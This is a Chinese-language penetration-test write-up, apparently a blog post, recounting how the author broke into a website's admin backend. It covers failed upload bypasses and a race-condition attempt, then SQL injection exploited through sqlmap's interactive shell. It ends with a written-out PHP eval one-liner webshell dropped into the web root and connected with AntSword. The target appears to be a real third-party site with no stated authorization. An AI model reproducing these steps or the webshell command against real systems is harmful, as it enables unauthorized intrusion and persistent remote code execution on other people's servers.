记录某网站后台GETSHELL

目录
0x00:探测后台
0x01:尝试上传图片马
0x02:利用在线网站收集信息
0x03:挖掘后台注入点
0x04:利用sqlmap写一句话

0x00:探测后台

首先直接就是后台，账号密码是自动填充的，直接登陆即可

登陆后呢就是这个破样子，话不多说开工

先把各个板块的功能啥的都看了一下，发现了几个可以上传的地方，同时对端口何目录进行了一波扫描，还有微步扫了一下网站的中间件等信息（这里就是先一波信息收集，为后面做准备）

在签到处，并没有发现上传点，但是可以打xss，但没什么卵用（我都进后台了还打个锤子xss）

0x01:尝试上传图片马

在这个签到报表处，可以看到有下载选项，可一抓包测试下是否存在任意文件下载，但这里对我getshell没啥用就先搁置了

然后又在任务管理处找到了一处上传点

接下来自然就是抓包一波测试，遗憾的发现这里是白名单，并且会重置你的文件名，使用00截断会提是检测到非法文件名，无法绕过

在这里我们先上传了正常文件，然后我们复制图片地址，还拿可以便利目录，但是无法../跳出

虽然可以遍历目录，但无法../跳出目录

把所有目录翻了一遍，发现存在一个编辑器，查询编辑器版本并没有发现什么有用的漏洞，尝试了编辑器上传文件和图片，同样使用了白名单，并且无法截断，淦

0x02:利用在线网站收集信息

做到此处不仅陷入沉思，这到底是个什么鬼，去查看了微步的检测结果，和扫描端口目录，（端口和目录并没有收获），端口扫到还存在另一个登陆页面，但是右显示验证码暂且无视，目录并没扫到有价值的

从微步中我们也得到一些有价值的信息，他的PHP版本可以使用截断，apache也存在解析漏洞，但这里都无法利用，因为apache的解析漏洞原理是，他是从右往左判断后缀，也就是我们可以1.php.ssss 这样，他认不出来ssss是个什么就会继续往前解析，遇到php他人出来了就当成php文件来解析，但此处设置了严格的白名单过滤，导致我们根本咩办法上传无法被识别的后缀

搜集端口后，发现开启了22，和3389，其他的并没有什么意义，和两个端口可以尝试进行爆破，但先搁置了

此后对那几处上传点进行了测试，并没有得到想要的结果，无法绕过

随后陷入沉思，最后跟大师傅们求助，有大师傅说，试试登录框存在注入不，是否可以直接sqlmap写shell，另一位大师傅则说，可以尝试条件竞争，妙哉，于是都进行了尝试，一边sqlmap跑，一边条件竞争了一下

这里条件竞争就是服务器是先把文件上传了，然后在判断，但这个过程非常快，所以理论手速够快就可以访问到，这里我抓去了上传一个php文件的包，这个文件只要被访问就会在当前目录创建一个1.php，其中有一个一句话木马，然后在抓去了一个访问包，俩个个都发送到了爆破模块开始疯狂跑但速度非常慢，此处无果

0x03:挖掘后台注入点

再次返回起始点，检查发现最后一个模块字里有个(旧)，说明他和前面的不是一样的

在这个点我们测试下sql注入，发现被正常执行了

而这个就没有

0x04:利用sqlmap写一句话

这里我们测试其他板块，会发现不行，所以我们抓了此处的查询包，丢去sqlmap跑

这里注意不要用—batch参数，因为一开始他会问你：是否要继续？（sqlmap可能有问题）这里默认选择是不继续的，所以用了batch它默认就给退掉了

这里问我们目标用的什么语言，这里是php

这里问需要爆破一下目录吗，选择y，然后我们得到了绝对路径

然后拿到了交互shell，dir一下可以出现目录，没问题，然后我们需要写入一个一句话，或者上传个一句话

这里呢我使用了echo直接写个一句话出来，方法有很多，这里sqlmap写这个交互shell的时候会创建一个上传用的php文件，我们可以通过它上传一句话，或着别的

这里我们写的语句是：

echo ^<?php @eval($_REQUEST[“HT”])?^> > D:\wamp\www\1.php

^是用来防止<>被转义，因为默认会把他们转义掉，所以我么要用^来防止被转义，这里就是把这个一句话写入到d盘www目录下的1.php文件里，没有的话他会创建一个文件，然后我们用我们的蚁剑连接

最后打波广告欢迎大家关注我们的公众号神隐攻防实验室